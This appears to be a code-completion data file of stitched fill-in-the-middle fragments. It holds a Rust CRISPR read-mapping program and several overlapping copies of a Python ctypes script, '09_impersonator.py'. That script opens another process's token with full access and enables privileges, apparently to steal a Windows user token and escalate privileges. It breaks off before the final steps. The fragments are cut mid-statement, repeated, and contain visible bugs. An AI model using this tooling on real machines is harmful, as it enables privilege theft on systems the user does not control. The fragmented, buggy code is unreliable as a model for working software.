let skip = !mismatch_in_pattern && found_mismatch || mismatch_in_pattern && !found_mismatch;
if !skip {
// build / expand cigar string, e.g. 20M -> MMMMMMMMMMMMMMMMMMMM, 10M,1I,5D ->
// MMMMMMMMMMIDDDDD, 20M1D =
let mut match_string = String::new();
for caps in match_string_re.captures_iter(&al_arr[5]) {
//println!("{}", &caps[1]);
let until_pos: i32 = caps[1].parse().expect("programmer error: cannot convert string to number for iterating");
for _ in 0..until_pos {
match_string.push_str(&caps[2]);
}
}
// now introduce mismatches int the string if needed
if found_mismatch {
for pos in mm_positions {
// TODO: next line is not compiling
match_string.insert_str(pos, "X");
}
}
// now apply input mapping regex
if mapping_match_re.is_match(&match_string) {
count_matched += 1;
match gene_matches.get_mut(al_arr[2].split("_").nth(0).unwrap()) {
Some(v) => *v += 1,
None => println!("illegal gene id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
//ref_libIds.get(&x).ok_or("illegal gene id encountered").map(|v| v += 1);
match ref_libIds.get_mut(&al_arr[2].to_owned().clone()) { | Some(v) => *v += 1,
None => println!("illegal reference lib id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
} | random_line_split | |
main.rs | () {
// buffers to hold parsed arguments
let mut fasta_file_arg = String::new();
let mut sam_file_arg = String::new();
let mut mapping_match_pattern = String::from("M{20,21}$");
let mut geneid_pattern = String::from("_");
let mut logfile_out = String::from("./log.out");
// TODO: change argparse to clap as suggested by Jules
parse_args(&mut fasta_file_arg,
&mut sam_file_arg,
&mut mapping_match_pattern,
&mut geneid_pattern,
&mut logfile_out);
//let fasta_re = Regex::new(&format!(r"^>(.+){}", geneid_pattern))
let fasta_re = Regex::new(r"^>(.+)")
.expect("programmer error in accession regex");
let mismatch_in_pattern = mapping_match_pattern.contains('x') ||
mapping_match_pattern.contains('X');
let mut gene_matches = BTreeMap::<String, u32>::new();
let mut ref_libIds = BTreeMap::<String, u32>::new();
let mut targets_matched = BTreeMap::<String, u32>::new();
//let mut geneIds = TreeMap::<String, u32>::new();
// first parse the reference genome from the fasta file
process_fasta(&fasta_file_arg, &fasta_re, geneid_pattern, &mut gene_matches, &mut ref_libIds);
// now parse the samfile
//let (mapped_geneids, count_total) =
let (count_total, count_matched) =
process_sam(&sam_file_arg, mismatch_in_pattern, &mapping_match_pattern, &mut gene_matches, &mut ref_libIds);
let out_base_name = sam_file_arg.replace(".sam", "");
let mut design_out_file =
BufWriter::new(File::create(format!("{}-designs.txt", out_base_name)).expect("problem opening output file"));
design_out_file.write_all(b"sgRNA\tCount\n").unwrap();
// let mut uniqLibIds
for (k, v) in &ref_libIds {
design_out_file.write_all(k.replace("\"", "").as_bytes()).unwrap();
design_out_file.write_all(b"\t").unwrap();
design_out_file.write_all(v.to_string().as_bytes()).unwrap();
design_out_file.write_all(b"\n").unwrap();
if(*v > 0) {
let gid = k.split("_").nth(0).unwrap().to_string();
*targets_matched.entry(gid).or_insert(0) += 1;
}
//println!("{}\t{}", k.replace("\"", ""), v);
}
let mut genes_out_file =
BufWriter::new(File::create(format!("{}-genes.txt", out_base_name)).expect("problem opening output file"));
genes_out_file.write_all(b"Gene\tCount\tdesigns-present\n").unwrap();
for (k, v) in &gene_matches {
genes_out_file.write_all(k.as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(v.to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(targets_matched.get(k).unwrap().to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\n").unwrap();
}
// foreach $target ( sort keys %reads) {
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// write log file
let mut log_file =
BufWriter::new(File::create(format!("{}_log.txt", fasta_file_arg)).expect("problem opening output file"));
log_file.write_all(b"Total\tMatched\n").unwrap();
log_file.write_all(b"\n").unwrap();
log_file.write_all(count_total.to_string().as_bytes()).unwrap();
log_file.write_all(b"\t").unwrap();
log_file.write_all(count_matched.to_string().as_bytes()).unwrap();
log_file.write_all(b"\n").unwrap();
// FIXME: two times "count_total"?
//println!("Total\tMatched");
//println!("{}\t{}", count_total, count_total);
}
fn parse_args(fasta_file_arg: &mut String,
sam_file_arg: &mut String,
mapping_match_pattern: &mut String,
geneid_pattern: &mut String,
logfile_out: &mut String) {
// put the argparsing in its own scope
let mut cli_parser = ArgumentParser::new();
cli_parser.set_description("mapper for CRISPRanalyzer");
cli_parser.refer(fasta_file_arg)
.add_option(&["-f", "--fasta-file"], Store, "Fasta Library Input File")
.required();
cli_parser.refer(sam_file_arg)
.add_option(&["-s", "--sam-file"], Store, "Sam Input file")
.required();
cli_parser.refer(mapping_match_pattern)
.add_option(&["-m", "--match-pattern"], Store, "Mapping match pattern e.g. M{20,21}$");
cli_parser.refer(geneid_pattern)
.add_option(&["-g", "--geneid-pattern"], Store, "GeneId pattern to parse, e.g. '_'");
cli_parser.refer(logfile_out).add_option(&["-l", "--logfile"], Store, "Logfile filename");
cli_parser.parse_args_or_exit();
}
fn | (fasta_file: &str, fasta_re: &Regex, geneid_pattern : String, gene_matches : &mut BTreeMap<String, u32>, ref_libIds: &mut BTreeMap<String, u32>) {
let fasta_file = BufReader::new(File::open(fasta_file).expect("Problem opening fastq file"));
for line in fasta_file.lines() {
let ln = line.expect("programmer error in reading fasta line by line");
ref_libIds.extend(
fasta_re.captures_iter(&ln)
// iterate over all Matches, which may have multiple capture groups each
.map(|captures: regex::Captures| {
let key = captures.get(1) // of this match, take the first capture group
.expect("fasta regex match should have had first capture group")
.as_str().to_owned(); // make Owned copy of capture-group contents
// add to gene_matches as well
gene_matches.insert(key.split("_").nth(0).unwrap().to_string(), 0);
(key, 0)
}
)
);
}
}
fn process_sam(sam_file: &str,
mismatch_in_pattern: bool,
mapping_match_pattern: &str,
gene_matches : &mut BTreeMap<String, u32>,
ref_libIds: &mut BTreeMap<String, u32>)
-> (u32,u32) {
//-> (HashMap<String, i32>, u32) {
// our buffer for the sam parser
let sam_file = BufReader::new(File::open(sam_file).expect("Problem opening fastq file"))
.lines();
let sam_mismatch_re =
Regex::new(r"MD:Z:([0-9]+)([A-Z]+)[0-9]+").expect("programmer error in mismatch regex");
let match_string_re = Regex::new(r"([0-9]+)([MIDSH])").expect("programmer error in match regex");
let mapping_match_re =
Regex::new(mapping_match_pattern).expect("programmer error in mapping match regexp");
let mut count_total : u32 = 0;
let mut count_matched : u32 = 0;
for l in sam_file {
let next_line = l.expect("io-error reading from samfile");
// fast forward the sam header to the beginning of the
// alignment section - skip the header starting with @
if next_line.starts_with('@') {
continue;
}
// ----------the basic algorithm starts here ---
// now split
let al_arr: Vec<&str> = next_line.trim_right().split("\t").collect();
//only count the mapped read if 2nd field, the FLAG, indicates an alignment that is neither rev-complementary, nor unmapped, nor a mutliple alignment (FLAG = 0)
if(al_arr[1] != "0") {
continue;
}
count_total += 1;
//println!("{}", al_arr[2]);
//let gene_id = al_arr[2].split("_").nth(0).unwrap();
let mut found_mismatch = false;
// the sam file format is so BAD that a certain position of any optional field cannot be
// predicted for sure, so we need to parse the whole line for the mismatch string
// at least we know that we have to search from the right end to the left because in the
// beginning we have mandantory fields (first 11)
let mut mm_positions: Vec<usize> = Vec::new();
for caps in sam_mismatch_re.captures_iter(&next_line) {
let mm_pos: i32 = caps[1].parse().expect("programmer error: cannot parse string to number for iterating");
mm_positions.push(mm_pos as usize);
found_mismatch = true;
}
// do some prechecks to save computation time...skip the obvious
let skip = !mismatch_in_pattern && | process_fasta | identifier_name |
09_impersonator.py | TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS = 0x0040
TOKEN_ADJUST_DEFAULT = 0x0080
TOKEN_ADJUST_SESSIONID = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = ( STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# LUID Structure
class LUID(ctypes.Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", DWORD),
]
# LUID and ATTRIBUTES
class LUID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("Luid", LUID),
("Attributes", DWORD),
]
# Privilege Set
class | (ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Control", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Token Set
class TOKEN_PRIVILEGES(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Security Attribute Set
class SECURITY_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("nLength", DWORD),
("lpSecurityDescriptor", HANDLE),
("nInheritHandle", BOOL),
]
# Structure for Star
class STARTUPINFO(ctypes.Structure):
_fields_ = [
("cb", DWORD),
("lpReserved", LPWSTR),
("lpDesktop", LPWSTR),
("lpTitle", LPWSTR),
("dwX", DWORD),
("dwY", DWORD),
("dwXSize", DWORD),
("dwYSize", DWORD),
("dwXCountChars", DWORD),
("dwYCountChars", DWORD),
("dwFillAttribute", DWORD),
("dwFlags", DWORD),
("wShowWindow", WORD),
("cbReserved2", WORD),
("lpReserved2", LPBYTE),
("hStdInput", HANDLE),
("hStdOutput", HANDLE),
("hStdError", HANDLE),
]
# Structure for Process Info
class PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
("hProcess", HANDLE),
("hThread", HANDLE),
("dwProcessId", DWORD),
("dwThreadId", DWORD),
]
# [FUNCTION] Enable Privileges
def enablePrivilege(priv, handle):
# 1) Use the LookupPrivilegeValueW API Call to get the LUID based on the String Privilege Name
# 2) Setup a PRIVILEGE_SET for the PrivilegeCheck Call to be used later - We need the LUID to be used
# BOOL PrivilegeCheck(
# HANDLE ClientToken,
# PPRIVILEGE_SET RequiredPrivileges,
# LPBOOL pfResult
# );
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1 # We are only looking at 1 privilege at a time
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES() # Setup a new LUID_AND_ATTRIBUTES
requiredPrivileges.Privileges.Luid = LUID() # Setup a new LUID inside of the LUID_AND_ATTRIBUTES structure
# BOOL LookupPrivilegeValueW(
# LPCWSTR lpSystemName,
# LPCWSTR lpName,
# PLUID lpLuid
# );
lpSystemName = None
lpName = priv
# Issue the call to configure the LUID with the Systems Value of that privilege
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(requiredPrivileges.Privileges.Luid))
# Error Handling
if response > 0:
print("[INFO] Privilege Adjustment Success: {0}".format(priv))
else:
print("[ERROR] Privilege Adjustment Failed: {0}. [-] Error Code: {a}".format(priv, k_handle.GetLastError()))
return 1
# Check if the correct privilege is enabled
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
# Error Handling
if response > 0:
print("[INFO] PrivilegeCheck Success!")
else:
print("[ERROR] PrivilegeCheck Failed! [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
if pfResult:
print("[INFO] Privilege Enabled: {0}".format(priv))
return 0
else:
print("[INFO] Privilege Disabled: {0}".format(priv))
# Enabling the privilege if disabled
print("[INFO] Enabling the Privilege...")
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
# BOOL AdjustTokenPrivileges(
# HANDLE TokenHandle,
# BOOL DisableAllPrivileges,
# PTOKEN_PRIVILEGES NewState,
# DWORD BufferLength,
# PTOKEN_PRIVILEGES PreviousState,
# PDWORD ReturnLength
# );
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength = ctypes.c_void_p()
# Configure Token Privilege
NewState.PrivilegeCount = 1;
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
# Error Handling
if response > 0:
print("[INFO] AdjustTokenPrivileges Enabled: {0}".format(priv))
else:
print("[ERROR] AdjustTokenPrivileges Disabled: {0}. [-] Error Code: {0}".format(priv, k_handle.GetLastError()))
return 1
return 0
# [FUNCTION] Open Process
def openProcessByPID(pid):
# HANDLE OpenProcess(
# DWORD dwDesiredAccess,
# BOOL bInheritHandle,
# DWAORD dwProcessId
# );
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = pid
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
# Error Handling
if hProcess <= 0:
print("[Error] No Privilieged Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
else:
print("[INFO] OpenProcess Handle Obtained:", hProcess)
return hProcess
# [FUNCTION] Open a Process Token
def openProcToken(pHandle):
# BOOL OpenProcessToken(
# HANDLE ProcessHandle,
# DWORD DesiredAccess,
# PHANDLE TokenHandle
# );
ProcessHandle = pHandle
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
# Error Handling
if response > 0:
print("[INFO] OpenProcess Token Obtained: {0}".format(TokenHandle))
return TokenHandle
else:
print("[ERROR] No Privilieged Token Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
# ============================================================================================================
# Grab the Windows Name from User32
lpClassName = None
lpWindowName = ctypes.c_char_p((input("[INPUT] Enter Window Name to Hook Into: ").encode('utf-8')))
# Grab a Handle to the Process
hWnd = u_handle.FindWindowA(lpClassName, lpWindowName)
# Error Handling
if hWnd == 0:
print("[ERROR] No Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Handle Obtained: {0}".format(hWnd))
# Get the PID of the Process at the Handle
# DWORD GetWindowThreadProcessId(
# HWND hWnd,
# LPDWORD lpdwProcessId
# );
lpdwProcessId = ctypes.c_ulong()
# Use byref to pass a pointer to the value as needed by the API Call
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
# Error Handling
if hWnd == 0:
print("[Error] No PID Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
else:
pid = str(lpdwProcessId)
print("[INFO] PID Obtained:", pid.strip("c_ulong()"))
# Open the Process and Grab a Table to its Token
print("[INFO] Getting TokenHandle...")
TokenHandle = openProcToken(openProcessByPID(lpdwProcessId))
# Get Handle of Current Process
print("[INFO] Getting CurrentProcessHandle...")
currentProcessHandle = openProcToken(openProcessByPID(k_handle.GetCurrentProcessId()))
# Attempt to Enable Se | PRIVILEGE_SET | identifier_name |
09_impersonator.py |
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS = 0x0040
TOKEN_ADJUST_DEFAULT = 0x0080
TOKEN_ADJUST_SESSIONID = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = ( STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# LUID Structure
class LUID(ctypes.Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", DWORD),
]
# LUID and ATTRIBUTES
class LUID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("Luid", LUID),
("Attributes", DWORD),
]
# Privilege Set
class PRIVILEGE_SET(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Control", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Token Set
class TOKEN_PRIVILEGES(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Security Attribute Set
class SECURITY_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("nLength", DWORD),
("lpSecurityDescriptor", HANDLE),
("nInheritHandle", BOOL),
]
# Structure for Star
class STARTUPINFO(ctypes.Structure):
_fields_ = [
("cb", DWORD),
("lpReserved", LPWSTR),
("lpDesktop", LPWSTR),
("lpTitle", LPWSTR),
("dwX", DWORD),
("dwY", DWORD),
("dwXSize", DWORD),
("dwYSize", DWORD),
("dwXCountChars", DWORD),
("dwYCountChars", DWORD),
("dwFillAttribute", DWORD),
("dwFlags", DWORD),
("wShowWindow", WORD),
("cbReserved2", WORD),
("lpReserved2", LPBYTE),
("hStdInput", HANDLE),
("hStdOutput", HANDLE),
("hStdError", HANDLE),
]
# Structure for Process Info
class PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
("hProcess", HANDLE),
("hThread", HANDLE),
("dwProcessId", DWORD),
("dwThreadId", DWORD),
]
# [FUNCTION] Enable Privileges
def enablePrivilege(priv, handle):
# 1) Use the LookupPrivilegeValueW API Call to get the LUID based on the String Privilege Name
# 2) Setup a PRIVILEGE_SET for the PrivilegeCheck Call to be used later - We need the LUID to be used
# BOOL PrivilegeCheck(
# HANDLE ClientToken,
# PPRIVILEGE_SET RequiredPrivileges,
# LPBOOL pfResult
# );
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1 # We are only looking at 1 privilege at a time
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES() # Setup a new LUID_AND_ATTRIBUTES
requiredPrivileges.Privileges.Luid = LUID() # Setup a new LUID inside of the LUID_AND_ATTRIBUTES structure
# BOOL LookupPrivilegeValueW(
# LPCWSTR lpSystemName,
# LPCWSTR lpName,
# PLUID lpLuid
# );
lpSystemName = None
lpName = priv
# Issue the call to configure the LUID with the Systems Value of that privilege
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(requiredPrivileges.Privileges.Luid))
# Error Handling
if response > 0:
print("[INFO] Privilege Adjustment Success: {0}".format(priv))
else:
print("[ERROR] Privilege Adjustment Failed: {0}. [-] Error Code: {a}".format(priv, k_handle.GetLastError()))
return 1
# Check if the correct privilege is enabled
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
# Error Handling
if response > 0:
print("[INFO] PrivilegeCheck Success!")
else:
|
if pfResult:
print("[INFO] Privilege Enabled: {0}".format(priv))
return 0
else:
print("[INFO] Privilege Disabled: {0}".format(priv))
# Enabling the privilege if disabled
print("[INFO] Enabling the Privilege...")
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
# BOOL AdjustTokenPrivileges(
# HANDLE TokenHandle,
# BOOL DisableAllPrivileges,
# PTOKEN_PRIVILEGES NewState,
# DWORD BufferLength,
# PTOKEN_PRIVILEGES PreviousState,
# PDWORD ReturnLength
# );
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength = ctypes.c_void_p()
# Configure Token Privilege
NewState.PrivilegeCount = 1;
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
# Error Handling
if response > 0:
print("[INFO] AdjustTokenPrivileges Enabled: {0}".format(priv))
else:
print("[ERROR] AdjustTokenPrivileges Disabled: {0}. [-] Error Code: {0}".format(priv, k_handle.GetLastError()))
return 1
return 0
# [FUNCTION] Open Process
def openProcessByPID(pid):
# HANDLE OpenProcess(
# DWORD dwDesiredAccess,
# BOOL bInheritHandle,
# DWAORD dwProcessId
# );
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = pid
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
# Error Handling
if hProcess <= 0:
print("[Error] No Privilieged Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
else:
print("[INFO] OpenProcess Handle Obtained:", hProcess)
return hProcess
# [FUNCTION] Open a Process Token
def openProcToken(pHandle):
# BOOL OpenProcessToken(
# HANDLE ProcessHandle,
# DWORD DesiredAccess,
# PHANDLE TokenHandle
# );
ProcessHandle = pHandle
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
# Error Handling
if response > 0:
print("[INFO] OpenProcess Token Obtained: {0}".format(TokenHandle))
return TokenHandle
else:
print("[ERROR] No Privilieged Token Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
# ============================================================================================================
# Grab the Windows Name from User32
lpClassName = None
lpWindowName = ctypes.c_char_p((input("[INPUT] Enter Window Name to Hook Into: ").encode('utf-8')))
# Grab a Handle to the Process
hWnd = u_handle.FindWindowA(lpClassName, lpWindowName)
# Error Handling
if hWnd == 0:
print("[ERROR] No Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Handle Obtained: {0}".format(hWnd))
# Get the PID of the Process at the Handle
# DWORD GetWindowThreadProcessId(
# HWND hWnd,
# LPDWORD lpdwProcessId
# );
lpdwProcessId = ctypes.c_ulong()
# Use byref to pass a pointer to the value as needed by the API Call
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
# Error Handling
if hWnd == 0:
print("[Error] No PID Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
else:
pid = str(lpdwProcessId)
print("[INFO] PID Obtained:", pid.strip("c_ulong()"))
# Open the Process and Grab a Table to its Token
print("[INFO] Getting TokenHandle...")
TokenHandle = openProcToken(openProcessByPID(lpdwProcessId))
# Get Handle of Current Process
print("[INFO] Getting CurrentProcessHandle...")
currentProcessHandle = openProcToken(openProcessByPID(k_handle.GetCurrentProcessId()))
# Attempt to Enable SeDebug | print("[ERROR] PrivilegeCheck Failed! [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1 | conditional_block |
09_impersonator.py |
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS = 0x0040
TOKEN_ADJUST_DEFAULT = 0x0080
TOKEN_ADJUST_SESSIONID = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = ( STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY | | TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# LUID Structure
class LUID(ctypes.Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", DWORD),
]
# LUID and ATTRIBUTES
class LUID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("Luid", LUID),
("Attributes", DWORD),
]
# Privilege Set
class PRIVILEGE_SET(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Control", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Token Set
class TOKEN_PRIVILEGES(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Security Attribute Set
class SECURITY_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("nLength", DWORD),
("lpSecurityDescriptor", HANDLE),
("nInheritHandle", BOOL),
]
# Structure for Star
class STARTUPINFO(ctypes.Structure):
_fields_ = [
("cb", DWORD),
("lpReserved", LPWSTR),
("lpDesktop", LPWSTR),
("lpTitle", LPWSTR),
("dwX", DWORD),
("dwY", DWORD),
("dwXSize", DWORD),
("dwYSize", DWORD),
("dwXCountChars", DWORD),
("dwYCountChars", DWORD),
("dwFillAttribute", DWORD),
("dwFlags", DWORD),
("wShowWindow", WORD),
("cbReserved2", WORD),
("lpReserved2", LPBYTE),
("hStdInput", HANDLE),
("hStdOutput", HANDLE),
("hStdError", HANDLE),
]
# Structure for Process Info
class PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
("hProcess", HANDLE),
("hThread", HANDLE),
("dwProcessId", DWORD),
("dwThreadId", DWORD),
]
# [FUNCTION] Enable Privileges
def enablePrivilege(priv, handle):
# 1) Use the LookupPrivilegeValueW API Call to get the LUID based on the String Privilege Name
# 2) Setup a PRIVILEGE_SET for the PrivilegeCheck Call to be used later - We need the LUID to be used
# BOOL PrivilegeCheck(
# HANDLE ClientToken,
# PPRIVILEGE_SET RequiredPrivileges,
# LPBOOL pfResult
# );
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1 # We are only looking at 1 privilege at a time
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES() # Setup a new LUID_AND_ATTRIBUTES
requiredPrivileges.Privileges.Luid = LUID() # Setup a new LUID inside of the LUID_AND_ATTRIBUTES structure
# BOOL LookupPrivilegeValueW(
# LPCWSTR lpSystemName,
# LPCWSTR lpName,
# PLUID lpLuid
# );
lpSystemName = None
lpName = priv
# Issue the call to configure the LUID with the Systems Value of that privilege
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(requiredPrivileges.Privileges.Luid))
# Error Handling
if response > 0:
print("[INFO] Privilege Adjustment Success: {0}".format(priv))
else:
print("[ERROR] Privilege Adjustment Failed: {0}. [-] Error Code: {a}".format(priv, k_handle.GetLastError()))
return 1
# Check if the correct privilege is enabled
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
# Error Handling
if response > 0:
print("[INFO] PrivilegeCheck Success!")
else:
print("[ERROR] PrivilegeCheck Failed! [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
if pfResult:
print("[INFO] Privilege Enabled: {0}".format(priv))
return 0
else:
print("[INFO] Privilege Disabled: {0}".format(priv))
# Enabling the privilege if disabled
print("[INFO] Enabling the Privilege...")
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
# BOOL AdjustTokenPrivileges(
# HANDLE TokenHandle,
# BOOL DisableAllPrivileges,
# PTOKEN_PRIVILEGES NewState,
# DWORD BufferLength,
# PTOKEN_PRIVILEGES PreviousState,
# PDWORD ReturnLength
# );
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength = ctypes.c_void_p()
# Configure Token Privilege
NewState.PrivilegeCount = 1;
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
# Error Handling
if response > 0:
print("[INFO] AdjustTokenPrivileges Enabled: {0}".format(priv))
else:
print("[ERROR] AdjustTokenPrivileges Disabled: {0}. [-] Error Code: {0}".format(priv, k_handle.GetLastError()))
return 1
return 0
# [FUNCTION] Open Process
def openProcessByPID(pid):
# HANDLE OpenProcess(
# DWORD dwDesiredAccess,
# BOOL bInheritHandle,
# DWAORD dwProcessId
# );
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = pid
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
# Error Handling
if hProcess <= 0:
print("[Error] No Privilieged Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
else:
print("[INFO] OpenProcess Handle Obtained:", hProcess)
return hProcess
# [FUNCTION] Open a Process Token
def openProcToken(pHandle):
# BOOL OpenProcessToken(
# HANDLE ProcessHandle,
# DWORD DesiredAccess,
# PHANDLE TokenHandle
# );
ProcessHandle = pHandle
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
# Error Handling
if response > 0:
print("[INFO] OpenProcess Token Obtained: {0}".format(TokenHandle))
return TokenHandle
else:
print("[ERROR] No Privilieged Token Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
# ============================================================================================================
# Grab the Windows Name from User32
lpClassName = None
lpWindowName = ctypes.c_char_p((input("[INPUT] Enter Window Name to Hook Into: ").encode('utf-8')))
# Grab a Handle to the Process
hWnd = u_handle.FindWindowA(lpClassName, lpWindowName)
# Error Handling
if hWnd == 0:
print("[ERROR] No Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Handle Obtained: {0}".format(hWnd))
# Get the PID of the Process at the Handle
# DWORD GetWindowThreadProcessId(
# HWND hWnd,
# LPDWORD lpdwProcessId
# );
lpdwProcessId = ctypes.c_ulong()
# Use byref to pass a pointer to the value as needed by the API Call
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
# Error Handling
if hWnd == 0:
print("[Error] No PID Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
else:
pid = str(lpdwProcessId)
print("[INFO] PID Obtained:", pid.strip("c_ulong()"))
# Open the Process and Grab a Table to its Token
print("[INFO] Getting TokenHandle...")
TokenHandle = openProcToken(openProcessByPID(lpdwProcessId))
# Get Handle of Current Process
